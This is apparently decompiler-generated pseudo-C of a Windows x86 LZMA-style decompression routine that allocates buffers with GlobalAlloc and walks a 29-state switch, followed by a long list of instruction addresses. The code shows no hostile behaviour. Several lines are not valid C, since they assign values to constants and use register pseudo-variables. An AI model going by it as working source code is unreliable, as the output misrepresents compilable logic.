                      						}
                      					}
                      					L1:
                      					_t534 =  *(_t614 - 0x88);
                      					if(_t534 > 0x1c) {
                      						L171:
                      						_t535 = _t534 | 0xffffffff;
                      						goto L172;
                      					}
                      					switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                      						case 0:
                      							if( *(_t614 - 0x6c) == 0) {
                      								goto L170;
                      							}
                      							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                      							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                      							_t534 =  *( *(_t614 - 0x70));
                      							if(_t534 > 0xe1) {
                      								goto L171;
                      							}
                      							_t538 = _t534 & 0x000000ff;
                      							_push(0x2d);
                      							asm("cdq");
                      							_pop(_t570);
                      							_push(9);
                      							_pop(_t571);
                      							_t610 = _t538 / _t570;
                      							_t540 = _t538 % _t570 & 0x000000ff;
                      							asm("cdq");
                      							_t605 = _t540 % _t571 & 0x000000ff;
                      							 *(_t614 - 0x3c) = _t605;
                      							 *(_t614 - 0x1c) = (1 << _t610) - 1;
                      							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
                      							_t613 = (0x300 << _t605 + _t610) + 0x736;
                      							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
                      								L10:
                      								if(_t613 == 0) {
                      									L12:
                      									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
                      									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                      									goto L15;
                      								} else {
                      									goto L11;
                      								}
                      								do {
                      									L11:
                      									_t613 = _t613 - 1;
                      									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
                      								} while (_t613 != 0);
                      								goto L12;
                      							}
                      							if( *(_t614 - 4) != 0) {
                      								GlobalFree( *(_t614 - 4));
                      							}
                      							_t534 = GlobalAlloc(0x40, 0x600); // executed
                      							 *(_t614 - 4) = _t534;
                      							if(_t534 == 0) {
                      								goto L171;
                      							} else {
                      								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
                      								goto L10;
                      							}
                      						case 1:
                      							L13:
                      							__eflags =  *(_t614 - 0x6c);
                      							if( *(_t614 - 0x6c) == 0) {
                      								 *(_t614 - 0x88) = 1;
                      								goto L170;
                      							}
                      							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                      							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
                      							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                      							_t45 = _t614 - 0x48;
                      							 *_t45 =  *(_t614 - 0x48) + 1;
                      							__eflags =  *_t45;
                      							L15:
                      							if( *(_t614 - 0x48) < 4) {
                      								goto L13;
                      							}
                      							_t546 =  *(_t614 - 0x40);
                      							if(_t546 ==  *(_t614 - 0x74)) {
                      								L20:
                      								 *(_t614 - 0x48) = 5;
                      								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
                      								goto L23;
                      							}
                      							 *(_t614 - 0x74) = _t546;
                      							if( *(_t614 - 8) != 0) {
                      								GlobalFree( *(_t614 - 8));
                      							}
                      							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
                      							 *(_t614 - 8) = _t534;
                      							if(_t534 == 0) {
                      								goto L171;
                      							} else {
                      								goto L20;
                      							}
                      						case 2:
                      							L24:
                      							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
                      							 *(_t614 - 0x84) = 6;
                      							 *(_t614 - 0x4c) = _t553;
                      							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
                      							goto L132;
                      						case 3:
                      							L21:
                      							__eflags =  *(_t614 - 0x6c);
                      							if( *(_t614 - 0x6c) == 0) {
                      								 *(_t614 - 0x88) = 3;
                      								goto L170;
                      							}
                      							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                      							_t67 = _t614 - 0x70;
                      							 *_t67 =  &(( *(_t614 - 0x70))[1]);
                      							__eflags =  *_t67;
                      							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                      							L23:
                      							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
                      							if( *(_t614 - 0x48) != 0) {
                      								goto L21;
                      							}
                      							goto L24;
                      						case 4:
                      							goto L133;
                      						case 5:
                      							goto L137;
                      						case 6:
                      							goto L0;
                      						case 7:
                      							__eflags =  *(__ebp - 0x40) - 1;
                      							if( *(__ebp - 0x40) != 1) {
                      								__eax =  *(__ebp - 0x24);
                      								 *(__ebp - 0x80) = 0x16;
                      								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                      								__eax =  *(__ebp - 0x28);
                      								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                      								__eax =  *(__ebp - 0x2c);
                      								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                      								__eax = 0;
                      								__eflags =  *(__ebp - 0x38) - 7;
                      								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                      								__al = __al & 0x000000fd;
                      								__eax = (__eflags >= 0) - 1 + 0xa;
                      								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                      								__eax =  *(__ebp - 4);
                      								__eax =  *(__ebp - 4) + 0x664;
                      								__eflags = __eax;
                      								 *(__ebp - 0x58) = __eax;
                      								goto L68;
                      							}
                      							__eax =  *(__ebp - 4);
                      							__ecx =  *(__ebp - 0x38);
                      							 *(__ebp - 0x84) = 8;
                      							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                      							goto L132;
                      						case 8:
                      							__eflags =  *(__ebp - 0x40);
                      							if( *(__ebp - 0x40) != 0) {
                      								__eax =  *(__ebp - 4);
                      								__ecx =  *(__ebp - 0x38);
                      								 *(__ebp - 0x84) = 0xa;
                      								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                      							} else {
                      								__eax =  *(__ebp - 0x38);
                      								__ecx =  *(__ebp - 4);
                      								__eax =  *(__ebp - 0x38) + 0xf;
                      								 *(__ebp - 0x84) = 9;
                      								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                      								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                      							}
                      							goto L132;
                      						case 9:
                      							__eflags =  *(__ebp - 0x40);
                      							if( *(__ebp - 0x40) != 0) {
                      								goto L89;
                      							}
                      							__eflags =  *(__ebp - 0x60);
                      							if( *(__ebp - 0x60) == 0) {
                      								goto L171;
                      							}
                      							__eax = 0;
                      							__eflags =  *(__ebp - 0x38) - 7;
                      							_t258 =  *(__ebp - 0x38) - 7 >= 0;
                      							__eflags = _t258;
                      							0 | _t258 = _t258 + _t258 + 9;
                      							 *(__ebp - 0x38) = _t258 + _t258 + 9;
                      							goto L75;
                      						case 0xa:
                      							__eflags =  *(__ebp - 0x40);
                      							if( *(__ebp - 0x40) != 0) {
                      								__eax =  *(__ebp - 4);
                      								__ecx =  *(__ebp - 0x38);
                      								 *(__ebp - 0x84) = 0xb;
                      								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                      								goto L132;
                      							}
                      							__eax =  *(__ebp - 0x28);
                      							goto L88;
                      						case 0xb:
                      							__eflags =  *(__ebp - 0x40);
                      							if( *(__ebp - 0x40) != 0) {
                      								__ecx =  *(__ebp - 0x24);
                      								__eax =  *(__ebp - 0x20);
                      								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                      							} else {
                      								__eax =  *(__ebp - 0x24);
                      							}
                      							__ecx =  *(__ebp - 0x28);
                      							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                      							L88:
                      							__ecx =  *(__ebp - 0x2c);
                      							 *(__ebp - 0x2c) = __eax;
                      							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                      							L89:
                      							__eax =  *(__ebp - 4);
                      							 *(__ebp - 0x80) = 0x15;
                      							__eax =  *(__ebp - 4) + 0xa68;
                      							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                      							goto L68;
                      						case 0xc:
                      							L99:
                      							__eflags =  *(__ebp - 0x6c);
                      							if( *(__ebp - 0x6c) == 0) {
                      								 *(__ebp - 0x88) = 0xc;
                      								goto L170;
                      							}
                      							__ecx =  *(__ebp - 0x70);
                      							__eax =  *(__ebp - 0xc);
                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      							_t334 = __ebp - 0x70;
                      							 *_t334 =  *(__ebp - 0x70) + 1;
                      							__eflags =  *_t334;
                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      							__eax =  *(__ebp - 0x2c);
                      							goto L101;
                      						case 0xd:
                      							goto L36;
                      						case 0xe:
                      							goto L45;
                      						case 0xf:
                      							goto L57;
                      						case 0x10:
                      							L109:
                      							__eflags =  *(__ebp - 0x6c);
                      							if( *(__ebp - 0x6c) == 0) {
                      								 *(__ebp - 0x88) = 0x10;
                      								goto L170;
                      							}
                      							__ecx =  *(__ebp - 0x70);
                      							__eax =  *(__ebp - 0xc);
                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      							_t365 = __ebp - 0x70;
                      							 *_t365 =  *(__ebp - 0x70) + 1;
                      							__eflags =  *_t365;
                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      							goto L111;
                      						case 0x11:
                      							L68:
                      							__esi =  *(__ebp - 0x58);
                      							 *(__ebp - 0x84) = 0x12;
                      							goto L132;
                      						case 0x12:
                      							__eflags =  *(__ebp - 0x40);
                      							if( *(__ebp - 0x40) != 0) {
                      								__eax =  *(__ebp - 0x58);
                      								 *(__ebp - 0x84) = 0x13;
                      								__esi =  *(__ebp - 0x58) + 2;
                      								goto L132;
                      							}
                      							__eax =  *(__ebp - 0x4c);
                      							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                      							__ecx =  *(__ebp - 0x58);
                      							__eax =  *(__ebp - 0x4c) << 4;
                      							__eflags = __eax;
                      							__eax =  *(__ebp - 0x58) + __eax + 4;
                      							goto L130;
                      						case 0x13:
                      							__eflags =  *(__ebp - 0x40);
                      							if( *(__ebp - 0x40) != 0) {
                      								_t469 = __ebp - 0x58;
                      								 *_t469 =  *(__ebp - 0x58) + 0x204;
                      								__eflags =  *_t469;
                      								 *(__ebp - 0x30) = 0x10;
                      								 *(__ebp - 0x40) = 8;
                      								L144:
                      								 *(__ebp - 0x7c) = 0x14;
                      								goto L145;
                      							}
                      							__eax =  *(__ebp - 0x4c);
                      							__ecx =  *(__ebp - 0x58);
                      							__eax =  *(__ebp - 0x4c) << 4;
                      							 *(__ebp - 0x30) = 8;
                      							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                      							L130:
                      							 *(__ebp - 0x58) = __eax;
                      							 *(__ebp - 0x40) = 3;
                      							goto L144;
                      						case 0x14:
                      							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                      							__eax =  *(__ebp - 0x80);
                      							goto L140;
                      						case 0x15:
                      							__eax = 0;
                      							__eflags =  *(__ebp - 0x38) - 7;
                      							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                      							__al = __al & 0x000000fd;
                      							__eax = (__eflags >= 0) - 1 + 0xb;
                      							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                      							goto L120;
                      						case 0x16:
                      							__eax =  *(__ebp - 0x30);
                      							__eflags = __eax - 4;
                      							if(__eax >= 4) {
                      								_push(3);
                      								_pop(__eax);
                      							}
                      							__ecx =  *(__ebp - 4);
                      							 *(__ebp - 0x40) = 6;
                      							__eax = __eax << 7;
                      							 *(__ebp - 0x7c) = 0x19;
                      							 *(__ebp - 0x58) = __eax;
                      							goto L145;
                      						case 0x17:
                      							L145:
                      							__eax =  *(__ebp - 0x40);
                      							 *(__ebp - 0x50) = 1;
                      							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                      							goto L149;
                      						case 0x18:
                      							L146:
                      							__eflags =  *(__ebp - 0x6c);
                      							if( *(__ebp - 0x6c) == 0) {
                      								 *(__ebp - 0x88) = 0x18;
                      								goto L170;
                      							}
                      							__ecx =  *(__ebp - 0x70);
                      							__eax =  *(__ebp - 0xc);
                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      							_t484 = __ebp - 0x70;
                      							 *_t484 =  *(__ebp - 0x70) + 1;
                      							__eflags =  *_t484;
                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      							L148:
                      							_t487 = __ebp - 0x48;
                      							 *_t487 =  *(__ebp - 0x48) - 1;
                      							__eflags =  *_t487;
                      							L149:
                      							__eflags =  *(__ebp - 0x48);
                      							if( *(__ebp - 0x48) <= 0) {
                      								__ecx =  *(__ebp - 0x40);
                      								__ebx =  *(__ebp - 0x50);
                      								0 = 1;
                      								__eax = 1 << __cl;
                      								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                      								__eax =  *(__ebp - 0x7c);
                      								 *(__ebp - 0x44) = __ebx;
                      								goto L140;
                      							}
                      							__eax =  *(__ebp - 0x50);
                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                      							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                      							__eax =  *(__ebp - 0x58);
                      							__esi = __edx + __eax;
                      							 *(__ebp - 0x54) = __esi;
                      							__ax =  *__esi;
                      							__edi = __ax & 0x0000ffff;
                      							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                      							__eflags =  *(__ebp - 0xc) - __ecx;
                      							if( *(__ebp - 0xc) >= __ecx) {
                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      								__cx = __ax;
                      								__cx = __ax >> 5;
                      								__eax = __eax - __ecx;
                      								__edx = __edx + 1;
                      								__eflags = __edx;
                      								 *__esi = __ax;
                      								 *(__ebp - 0x50) = __edx;
                      							} else {
                      								 *(__ebp - 0x10) = __ecx;
                      								0x800 = 0x800 - __edi;
                      								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                      								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                      								 *__esi = __cx;
                      							}
                      							__eflags =  *(__ebp - 0x10) - 0x1000000;
                      							if( *(__ebp - 0x10) >= 0x1000000) {
                      								goto L148;
                      							} else {
                      								goto L146;
                      							}
                      						case 0x19:
                      							__eflags = __ebx - 4;
                      							if(__ebx < 4) {
                      								 *(__ebp - 0x2c) = __ebx;
                      								L119:
                      								_t393 = __ebp - 0x2c;
                      								 *_t393 =  *(__ebp - 0x2c) + 1;
                      								__eflags =  *_t393;
                      								L120:
                      								__eax =  *(__ebp - 0x2c);
                      								__eflags = __eax;
                      								if(__eax == 0) {
                      									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                      									goto L170;
                      								}
                      								__eflags = __eax -  *(__ebp - 0x60);
                      								if(__eax >  *(__ebp - 0x60)) {
                      									goto L171;
                      								}
                      								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                      								__eax =  *(__ebp - 0x30);
                      								_t400 = __ebp - 0x60;
                      								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                      								__eflags =  *_t400;
                      								goto L123;
                      							}
                      							__ecx = __ebx;
                      							__eax = __ebx;
                      							__ecx = __ebx >> 1;
                      							__eax = __ebx & 0x00000001;
                      							__ecx = (__ebx >> 1) - 1;
                      							__al = __al | 0x00000002;
                      							__eax = (__ebx & 0x00000001) << __cl;
                      							__eflags = __ebx - 0xe;
                      							 *(__ebp - 0x2c) = __eax;
                      							if(__ebx >= 0xe) {
                      								__ebx = 0;
                      								 *(__ebp - 0x48) = __ecx;
                      								L102:
                      								__eflags =  *(__ebp - 0x48);
                      								if( *(__ebp - 0x48) <= 0) {
                      									__eax = __eax + __ebx;
                      									 *(__ebp - 0x40) = 4;
                      									 *(__ebp - 0x2c) = __eax;
                      									__eax =  *(__ebp - 4);
                      									__eax =  *(__ebp - 4) + 0x644;
                      									__eflags = __eax;
                      									L108:
                      									__ebx = 0;
                      									 *(__ebp - 0x58) = __eax;
                      									 *(__ebp - 0x50) = 1;
                      									 *(__ebp - 0x44) = 0;
                      									 *(__ebp - 0x48) = 0;
                      									L112:
                      									__eax =  *(__ebp - 0x40);
                      									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                      									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                      										_t391 = __ebp - 0x2c;
                      										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                      										__eflags =  *_t391;
                      										goto L119;
                      									}
                      									__eax =  *(__ebp - 0x50);
                      									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                      									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                      									__eax =  *(__ebp - 0x58);
                      									__esi = __edi + __eax;
                      									 *(__ebp - 0x54) = __esi;
                      									__ax =  *__esi;
                      									__ecx = __ax & 0x0000ffff;
                      									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                      									__eflags =  *(__ebp - 0xc) - __edx;
                      									if( *(__ebp - 0xc) >= __edx) {
                      										__ecx = 0;
                      										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                      										__ecx = 1;
                      										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                      										__ebx = 1;
                      										__ecx =  *(__ebp - 0x48);
                      										__ebx = 1 << __cl;
                      										__ecx = 1 << __cl;
                      										__ebx =  *(__ebp - 0x44);
                      										__ebx =  *(__ebp - 0x44) | __ecx;
                      										__cx = __ax;
                      										__cx = __ax >> 5;
                      										__eax = __eax - __ecx;
                      										__edi = __edi + 1;
                      										__eflags = __edi;
                      										 *(__ebp - 0x44) = __ebx;
                      										 *__esi = __ax;
                      										 *(__ebp - 0x50) = __edi;
                      									} else {
                      										 *(__ebp - 0x10) = __edx;
                      										0x800 = 0x800 - __ecx;
                      										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                      										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                      										 *__esi = __dx;
                      									}
                      									__eflags =  *(__ebp - 0x10) - 0x1000000;
                      									if( *(__ebp - 0x10) >= 0x1000000) {
                      										L111:
                      										_t368 = __ebp - 0x48;
                      										 *_t368 =  *(__ebp - 0x48) + 1;
                      										__eflags =  *_t368;
                      										goto L112;
                      									} else {
                      										goto L109;
                      									}
                      								}
                      								__ecx =  *(__ebp - 0xc);
                      								__ebx = __ebx + __ebx;
                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                      								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                      								 *(__ebp - 0x44) = __ebx;
                      								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                      									__ecx =  *(__ebp - 0x10);
                      									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                      									__ebx = __ebx | 0x00000001;
                      									__eflags = __ebx;
                      									 *(__ebp - 0x44) = __ebx;
                      								}
                      								__eflags =  *(__ebp - 0x10) - 0x1000000;
                      								if( *(__ebp - 0x10) >= 0x1000000) {
                      									L101:
                      									_t338 = __ebp - 0x48;
                      									 *_t338 =  *(__ebp - 0x48) - 1;
                      									__eflags =  *_t338;
                      									goto L102;
                      								} else {
                      									goto L99;
                      								}
                      							}
                      							__edx =  *(__ebp - 4);
                      							__eax = __eax - __ebx;
                      							 *(__ebp - 0x40) = __ecx;
                      							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                      							goto L108;
                      						case 0x1a:
                      							goto L55;
                      						case 0x1b:
                      							L75:
                      							__eflags =  *(__ebp - 0x64);
                      							if( *(__ebp - 0x64) == 0) {
                      								 *(__ebp - 0x88) = 0x1b;
                      								goto L170;
                      							}
                      							__eax =  *(__ebp - 0x14);
                      							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                      							__eflags = __eax -  *(__ebp - 0x74);
                      							if(__eax >=  *(__ebp - 0x74)) {
                      								__eax = __eax +  *(__ebp - 0x74);
                      								__eflags = __eax;
                      							}
                      							__edx =  *(__ebp - 8);
                      							__cl =  *(__eax + __edx);
                      							__eax =  *(__ebp - 0x14);
                      							 *(__ebp - 0x5c) = __cl;
                      							 *(__eax + __edx) = __cl;
                      							__eax = __eax + 1;
                      							__edx = 0;
                      							_t274 = __eax %  *(__ebp - 0x74);
                      							__eax = __eax /  *(__ebp - 0x74);
                      							__edx = _t274;
                      							__eax =  *(__ebp - 0x68);
                      							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                      							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                      							_t283 = __ebp - 0x64;
                      							 *_t283 =  *(__ebp - 0x64) - 1;
                      							__eflags =  *_t283;
                      							 *( *(__ebp - 0x68)) = __cl;
                      							goto L79;
                      						case 0x1c:
                      							while(1) {
                      								L123:
                      								__eflags =  *(__ebp - 0x64);
                      								if( *(__ebp - 0x64) == 0) {
                      									break;
                      								}
                      								__eax =  *(__ebp - 0x14);
                      								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                      								__eflags = __eax -  *(__ebp - 0x74);
                      								if(__eax >=  *(__ebp - 0x74)) {
                      									__eax = __eax +  *(__ebp - 0x74);
                      									__eflags = __eax;
                      								}
                      								__edx =  *(__ebp - 8);
                      								__cl =  *(__eax + __edx);
                      								__eax =  *(__ebp - 0x14);
                      								 *(__ebp - 0x5c) = __cl;
                      								 *(__eax + __edx) = __cl;
                      								__eax = __eax + 1;
                      								__edx = 0;
                      								_t414 = __eax %  *(__ebp - 0x74);
                      								__eax = __eax /  *(__ebp - 0x74);
                      								__edx = _t414;
                      								__eax =  *(__ebp - 0x68);
                      								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                      								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                      								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                      								__eflags =  *(__ebp - 0x30);
                      								 *( *(__ebp - 0x68)) = __cl;
                      								 *(__ebp - 0x14) = __edx;
                      								if( *(__ebp - 0x30) > 0) {
                      									continue;
                      								} else {
                      									goto L80;
                      								}
                      							}
                      							 *(__ebp - 0x88) = 0x1c;
                      							goto L170;
                      					}
                      				}
                      			}













                      0x00000000
                      0x00406d5f
                      0x00406d5f
                      0x00406d64
                      0x00406ddb
                      0x00406de2
                      0x00406dec
                      0x004073cb
                      0x004073cb
                      0x004073ce
                      0x004073ce
                      0x004073d4
                      0x004073da
                      0x004073e0
                      0x004073fa
                      0x004073fd
                      0x00407403
                      0x0040740e
                      0x00407410
                      0x004073e2
                      0x004073e2
                      0x004073f1
                      0x004073f5
                      0x004073f5
                      0x0040741a
                      0x00407441
                      0x00407441
                      0x00407447
                      0x00407447
                      0x00000000
                      0x0040741c
                      0x0040741c
                      0x00407420
                      0x004075cf
                      0x00000000
                      0x004075cf
                      0x0040742c
                      0x00407433
                      0x0040743b
                      0x0040743e
                      0x00000000
                      0x0040743e
                      0x00406d66
                      0x00406d66
                      0x00406d6a
                      0x00406d72
                      0x00406d75
                      0x00406d77
                      0x00406d7a
                      0x00406d7c
                      0x00406d81
                      0x00406d84
                      0x00406d8b
                      0x00406d92
                      0x00406d95
                      0x00406da0
                      0x00406da8
                      0x00406da8
                      0x00406da2
                      0x00406da2
                      0x00406da2
                      0x00406d97
                      0x00406d97
                      0x00406d97
                      0x00406daf
                      0x00406dcd
                      0x00406dcf
                      0x00406fa2
                      0x00406fa2
                      0x00406fa5
                      0x00406fa8
                      0x00406fab
                      0x00406fae
                      0x00406fb1
                      0x00406fb4
                      0x00406fb7
                      0x00406fba
                      0x00406fc0
                      0x00406fd8
                      0x00406fdb
                      0x00406fde
                      0x00406fe1
                      0x00406fe1
                      0x00406fe4
                      0x00406fea
                      0x00406fc2
                      0x00406fc2
                      0x00406fca
                      0x00406fcf
                      0x00406fd1
                      0x00406fd3
                      0x00406fd3
                      0x00406ff4
                      0x00406ff7
                      0x00406f9a
                      0x00406fa0
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406ff9
                      0x00406f75
                      0x00406f79
                      0x00407581
                      0x00000000
                      0x00407581
                      0x00406f7f
                      0x00406f82
                      0x00406f85
                      0x00406f89
                      0x00406f8c
                      0x00406f92
                      0x00406f94
                      0x00406f94
                      0x00406f97
                      0x00000000
                      0x00406f97
                      0x00406db1
                      0x00406db1
                      0x00406db4
                      0x00406dba
                      0x00406dbc
                      0x00406dbc
                      0x00406dbf
                      0x00406dc2
                      0x00406dc4
                      0x00406dc5
                      0x00406dc8
                      0x00406e35
                      0x00406e35
                      0x00406e39
                      0x00406e3c
                      0x00406e3f
                      0x00406e42
                      0x00406e45
                      0x00406e46
                      0x00406e49
                      0x00406e4b
                      0x00406e51
                      0x00406e54
                      0x00406e57
                      0x00406e5a
                      0x00406e5d
                      0x00406e63
                      0x00406e7f
                      0x00406e82
                      0x00406e85
                      0x00406e88
                      0x00406e8f
                      0x00406e95
                      0x00406e99
                      0x00406e65
                      0x00406e65
                      0x00406e69
                      0x00406e71
                      0x00406e76
                      0x00406e78
                      0x00406e7a
                      0x00406e7a
                      0x00406ea3
                      0x00406ea6
                      0x00406e1d
                      0x00406e1d
                      0x00406e23
                      0x00406ed6
                      0x00406edc
                      0x00000000
                      0x00000000
                      0x00406ede
                      0x00406ee1
                      0x00406ee4
                      0x00406ee7
                      0x00406eea
                      0x00406eed
                      0x00406ef0
                      0x00406ef3
                      0x00406ef6
                      0x00406efc
                      0x00406f14
                      0x00406f17
                      0x00406f1a
                      0x00406f1d
                      0x00406f1d
                      0x00406f20
                      0x00406f26
                      0x00406efe
                      0x00406efe
                      0x00406f06
                      0x00406f0b
                      0x00406f0d
                      0x00406f0f
                      0x00406f0f
                      0x00406f30
                      0x00406f33
                      0x00406eb1
                      0x00406eb5
                      0x00407575
                      0x00000000
                      0x00407575
                      0x00406ebb
                      0x00406ebe
                      0x00406ec1
                      0x00406ec5
                      0x00406ec8
                      0x00406ece
                      0x00406ed0
                      0x00406ed0
                      0x00406ed3
                      0x00406ed3
                      0x00406f33
                      0x00406f3a
                      0x00406f3a
                      0x00406f3a
                      0x00406f3e
                      0x00406f3e
                      0x00406f41
                      0x00406f44
                      0x00406f48
                      0x0040758d
                      0x00000000
                      0x0040758d
                      0x00406f4e
                      0x00406f51
                      0x00406f54
                      0x00406f57
                      0x00406f5a
                      0x00406f5d
                      0x00406f60
                      0x00406f62
                      0x00406f65
                      0x00406f68
                      0x00406f6b
                      0x00406f6d
                      0x00406f6d
                      0x00406f6d
                      0x0040710a
                      0x0040710a
                      0x0040710d
                      0x0040710d
                      0x00000000
                      0x0040710d
                      0x00406e2f
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406eac
                      0x00406df8
                      0x00406dfc
                      0x00407569
                      0x004075e5
                      0x004075ed
                      0x004075f4
                      0x004075f6
                      0x004075fd
                      0x00407601
                      0x00407601
                      0x00406e02
                      0x00406e05
                      0x00406e08
                      0x00406e0c
                      0x00406e0f
                      0x00406e15
                      0x00406e17
                      0x00406e17
                      0x00406e1a
                      0x00000000
                      0x00406e1a
                      0x00406ea6
                      0x00406daf
                      0x00406be3
                      0x00406be3
                      0x00406bec
                      0x004075fa
                      0x004075fa
                      0x00000000
                      0x004075fa
                      0x00406bf2
                      0x00000000
                      0x00406bfd
                      0x00000000
                      0x00000000
                      0x00406c06
                      0x00406c09
                      0x00406c0c
                      0x00406c10
                      0x00000000
                      0x00000000
                      0x00406c16
                      0x00406c19
                      0x00406c1b
                      0x00406c1c
                      0x00406c1f
                      0x00406c21
                      0x00406c22
                      0x00406c24
                      0x00406c27
                      0x00406c2c
                      0x00406c31
                      0x00406c3a
                      0x00406c4d
                      0x00406c50
                      0x00406c5c
                      0x00406c84
                      0x00406c86
                      0x00406c94
                      0x00406c94
                      0x00406c98
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406c88
                      0x00406c88
                      0x00406c8b
                      0x00406c8c
                      0x00406c8c
                      0x00000000
                      0x00406c88
                      0x00406c62
                      0x00406c67
                      0x00406c67
                      0x00406c70
                      0x00406c78
                      0x00406c7b
                      0x00000000
                      0x00406c81
                      0x00406c81
                      0x00000000
                      0x00406c81
                      0x00000000
                      0x00406c9e
                      0x00406c9e
                      0x00406ca2
                      0x0040754e
